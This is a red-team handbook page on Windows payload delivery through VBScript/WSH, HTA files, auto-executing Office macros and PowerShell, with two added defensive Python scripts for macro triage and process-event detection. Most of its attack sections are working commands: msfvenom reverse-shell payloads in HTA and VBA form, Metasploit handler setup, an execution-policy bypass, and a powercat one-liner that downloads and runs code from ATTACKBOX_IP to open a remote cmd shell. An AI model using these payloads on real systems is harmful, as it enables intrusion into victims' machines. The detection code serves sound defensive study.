handbook/tools/4.Exploitation/Shell-and-Reverse-Shell/1.Payloads-Windows-and-Linux/Windows/Macros Payloads (MS World, Excel, ...).md
2024-08-31 01:07:22 +02:00

Why use macro payloads?

As security measures in organizations become more robust, executing payloads within controlled environments becomes increasingly challenging for red teamers. Since .exe files are often blocked or monitored, alternative techniques such as built-in Windows scripting technologies are used instead. This section covers some of the popular and effective scripting techniques, including WSH, HTA, VBA and PSH, that red teamers use to execute payloads.

  • Bypassing .exe Monitoring using WSH, HTA, VBA, PSH

Windows Scripting Host (WSH)

The Windows Scripting Host is a Windows-native engine, cscript.exe (for command-line scripts) and wscript.exe (for UI scripts), responsible for executing Microsoft Visual Basic Scripts (VBScript), including .vbs and .vbe files. For more information about VBScript, see the link below. It is important to note that the VBScript engine on a Windows operating system runs applications with the same level of access and permissions as the current user; therefore, it is useful for red teamers.

Create the code in a .vbs or .txt file

  • Specify the location of the executable we want to launch
' Create a WSH shell object and start calc.exe (the script's own path is passed as an argument); 0 = hidden window, True = wait for exit
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True
  • Exceptions (some apps are on the default PATH, so there is no need to provide the full executable location)
' cmd.exe is resolved via PATH, so the bare name is enough
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run "cmd.exe"

Launch the file

# Launch the VBScript from a .vbs file
c:\Windows\System32>wscript c:\Users\thm\Desktop\payload.vbs
c:\Windows\System32>cscript.exe c:\Users\thm\Desktop\payload.vbs

# Launch the VBScript from a .txt file (the /e switch selects the script engine explicitly)
c:\Windows\System32>wscript /e:VBScript c:\Users\thm\Desktop\payload.txt

More information about VBScript here ---> https://en.wikipedia.org/wiki/VBScript

An HTML Application (HTA)

HTA stands for "HTML Application". It lets you package a web page together with everything that controls how it is displayed and rendered into a single downloadable file. HTML Applications, also known as HTAs, are dynamic HTML pages that can contain JScript and VBScript. The LOLBin (living-off-the-land binary) mshta.exe is used to execute HTA files; it can be run by itself or launched automatically from Internet Explorer.

Reverse Shell

MSFvenom -> Using hta (HTML)

msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=1234 -f hta-psh -o exploit.hta
  • Let the victim open exploit.hta from Microsoft Edge (this will automatically run the HTML/HTA element and give back a reverse shell)
  • More information ---> TryHackMe module (section "An HTML Application - HTA")

Metasploit -> Using hta (HTML)

use exploit/windows/misc/hta_server
set LHOST IP
set LPORT 1234
set SRVHOST SAME-IP
set payload windows/meterpreter/reverse_tcp
exploit
  • Let the victim open exploit.hta from Microsoft Edge (this will automatically run the HTML/HTA element and give back a reverse shell) --> served with a Python web server, for example
  • More information ---> TryHackMe module (section "An HTML Application - HTA")

Visual Basic for Application (VBA) - Macros

VBA stands for Visual Basic for Applications, a programming language by Microsoft implemented for Microsoft applications such as Word, Excel and PowerPoint. VBA lets you automate nearly every keyboard and mouse interaction between a user and Microsoft Office applications.

Macros are embedded code in Microsoft Office applications, written in a programming language known as Visual Basic for Applications (VBA). They are used to create custom functions that speed up manual tasks by automating them. One of VBA's features is access to the Windows Application Programming Interface (API) and other low-level functionality. For more information about VBA, visit here.

  • Create/Run Macros (Microsoft Word): first, open the Visual Basic Editor by selecting View → Macros. The Macros window lets us create our own macro within the document.

    • Choose a name, set "Macros in" to "Document1" and click Create

    Finally, run the macro with F5 or Run → Run Sub/UserForm.

    ' Both event handlers fire when the document is opened; each simply calls HACKING
    Sub Document_Open()
      HACKING
    End Sub
    
    Sub AutoOpen()
      HACKING
    End Sub
    
    ' The payload itself: a message box in this first test
    Sub HACKING()
       MsgBox ("You got Hack!")
    End Sub
    

    It is important to note that to make the macro work, we need to save it in a macro-enabled format such as .doc or .docm. Now let's save the file as a Word 97-2003 Template, where macros are enabled, by going to File → Save Document1, choosing Word 97-2003 Document as the "Save as type", and finally clicking Save.

    Let's close the Word document that we saved. If we reopen it, Microsoft Word shows a security message indicating that macros have been disabled and offers the option to enable them. Once enabled, the payload is executed.

    • Second Example with calc.exe
    Sub PoC()
    	Dim payload As String
    	payload = "calc.exe"
    	CreateObject("Wscript.Shell").Run payload,0
    End Sub
    
    • To explain the code in detail: with Dim payload As String we declare the payload variable as a string using the Dim keyword; with payload = "calc.exe" we specify the payload name; and finally with CreateObject("Wscript.Shell").Run payload we create a Windows Scripting Host (WSH) object and run the payload. Note that if you rename the function, you must also update the call to it in the AutoOpen() and Document_Open() functions.

    It is important to mention that we can combine VBAs with previously covered methods, such as HTAs and WSH. VBAs/macros by themselves do not inherently bypass any detections.
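
Added example, not code from the handbook or from TryHackMe: a small Python triage script that parses VBA source and reports whether one of the auto-execution entry points named on this page (AutoOpen, Document_Open, Workbook_Open) transitively reaches a sub that creates a Wscript.Shell object or calls .Run/Shell(). The sample macro is constructed from the page's two snippets; because the script follows bare-name calls between subs, the renaming caveat above (a payload sub only fires if an entry point still calls it) shows up as the absence of a finding.

```python
import re

# Constructed sample (not a real document's macro): the page's Document_Open/AutoOpen
# handlers calling HACKING, with the WSH launcher from the second example as its body.
SAMPLE_MACRO = """
Sub Document_Open()
  HACKING
End Sub

Sub AutoOpen()
  HACKING
End Sub

Sub HACKING()
   Dim payload As String
   payload = "calc.exe"
   CreateObject("Wscript.Shell").Run payload, 0
End Sub
"""

# Office auto-execution entry points named on this page (Word and Excel).
AUTO_EXEC = {"autoopen", "document_open", "workbook_open"}
# Calls that hand control to the operating system: WSH object creation, .Run, Shell().
SUSPICIOUS = re.compile(r'CreateObject\s*\(\s*"Wscript\.Shell"\s*\)|\.Run\b|\bShell\s*\(', re.I)
SUB_RE = re.compile(r'^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+(\w+)\s*\(.*?\)(.*?)'
                    r'^\s*End\s+(?:Sub|Function)', re.I | re.S | re.M)

def parse_subs(src):
    """Map lower-cased Sub/Function name -> body text."""
    return {m.group(1).lower(): m.group(2) for m in SUB_RE.finditer(src)}

def reachable_from(entry, subs):
    """Set of subs reachable from `entry` by following bare-name calls (depth-first)."""
    seen, stack = set(), [entry]
    while stack:
        name = stack.pop()
        if name in seen or name not in subs:
            continue
        seen.add(name)
        stack.extend(t.lower() for t in re.findall(r"\w+", subs[name]) if t.lower() in subs)
    return seen

def triage(src):
    """(entry_point, sub) pairs where an auto-exec entry point reaches a process launch."""
    subs = parse_subs(src)
    return [(entry, name)
            for entry in sorted(AUTO_EXEC & subs.keys())
            for name in sorted(reachable_from(entry, subs))
            if SUSPICIOUS.search(subs[name])]
```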

HTA Reverse Connection (Using Microsoft Word Macros)

MSFvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=1234 -f vba
  • Insert the output in the Macros
  • Change Workbook_Open() to Document_Open() ---> Workbook_Open() is the equivalent entry point for Excel workbooks

Setup Meterpreter reverse shell

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set LHOST IP
set LPORT 1234
exploit 
  • Now wait for the target to open the document

  • More information ---> TryHackMe module (section "Visual Basic for Application - VBA")

PowerShell (PSH)

PowerShell is an object-oriented programming language executed from the Dynamic Language Runtime (DLR) in .NET with some exceptions for legacy uses. Check out the TryHackMe room, Hacking with PowerShell for more information about PowerShell.

Bypass the execution policy (to allow running PowerShell scripts)

Get-ExecutionPolicy                            ---> Check Policy

powershell -ex bypass
powershell -ex bypass -File something.ps1

Reverse shell using powercat

git clone https://github.com/besimorhino/powercat.git
  • Open a Python web server (no need to download powercat on the target machine, since the "Launch Powercat" command fetches it automatically)

Launch Netcat

nc -lvp 1337

Launch Powercat (target)

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://ATTACKBOX_IP:8080/powercat.ps1');powercat -c ATTACKBOX_IP -p 1337 -e cmd"
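
Added example, not part of the original handbook: Python detection logic for the process-creation telemetry that the techniques on this page leave behind (an Office parent spawning a script host, mshta.exe handed an .hta from the browser, wscript /e:VBScript on a non-.vbs file, and PowerShell run with -ex bypass or IEX plus DownloadString). It runs over constructed Sysmon-style records in a simple Key=Value|Key=Value format of my own; the paths and the 192.0.2.10 address are sample values.

```python
import re
from pathlib import PureWindowsPath

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "cmd.exe"}
BROWSERS = {"msedge.exe", "iexplore.exe"}
PS_FLAGS = re.compile(r"-e(?:x|xecutionpolicy)?\s+bypass|downloadstring|\biex\b", re.I)

def parse_event(line):
    """Parse one constructed 'Key=Value|Key=Value' process-creation record into a dict."""
    ev = {}
    for field in line.strip().split("|"):
        key, _, value = field.partition("=")
        ev[key.strip()] = value.strip()
    return ev

def image_name(path):
    return PureWindowsPath(path).name.lower()

def detect(ev):
    """Names of the rules an event matches (empty list means nothing flagged)."""
    parent, image = image_name(ev.get("ParentImage", "")), image_name(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")
    hits = []
    if parent in OFFICE and image in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")     # macro -> WSH / cmd / PowerShell
    if image == "mshta.exe" and (parent in BROWSERS or ".hta" in cmd.lower()):
        hits.append("hta_launched")                   # .hta handed to mshta from the browser
    if image in {"wscript.exe", "cscript.exe"} and re.search(r"/e:vbscript", cmd, re.I):
        hits.append("wsh_engine_override")            # script body hidden in a .txt file
    if image == "powershell.exe" and PS_FLAGS.search(cmd):
        hits.append("powershell_bypass_or_download")  # -ex bypass / IEX + DownloadString
    return hits

def scan(lines):
    """(index, hits) for every record that triggers at least one rule."""
    results = [(i, detect(parse_event(l))) for i, l in enumerate(lines)]
    return [(i, h) for i, h in results if h]

# Constructed records mirroring the page's commands; paths and IPs are sample values.
SAMPLE_EVENTS = [
    r"ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|Image=C:\Windows\System32\wscript.exe|CommandLine=wscript c:\Users\thm\Desktop\payload.vbs",
    r"ParentImage=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe|Image=C:\Windows\System32\mshta.exe|CommandLine=mshta.exe C:\Users\thm\Downloads\exploit.hta",
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\wscript.exe|CommandLine=wscript /e:VBScript c:\Users\thm\Desktop\payload.txt",
    r"ParentImage=C:\Windows\System32\cmd.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell -c IEX(New-Object System.Net.WebClient).DownloadString('http://192.0.2.10:8080/powercat.ps1')",
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\notepad.exe|CommandLine=notepad.exe notes.txt",
]
```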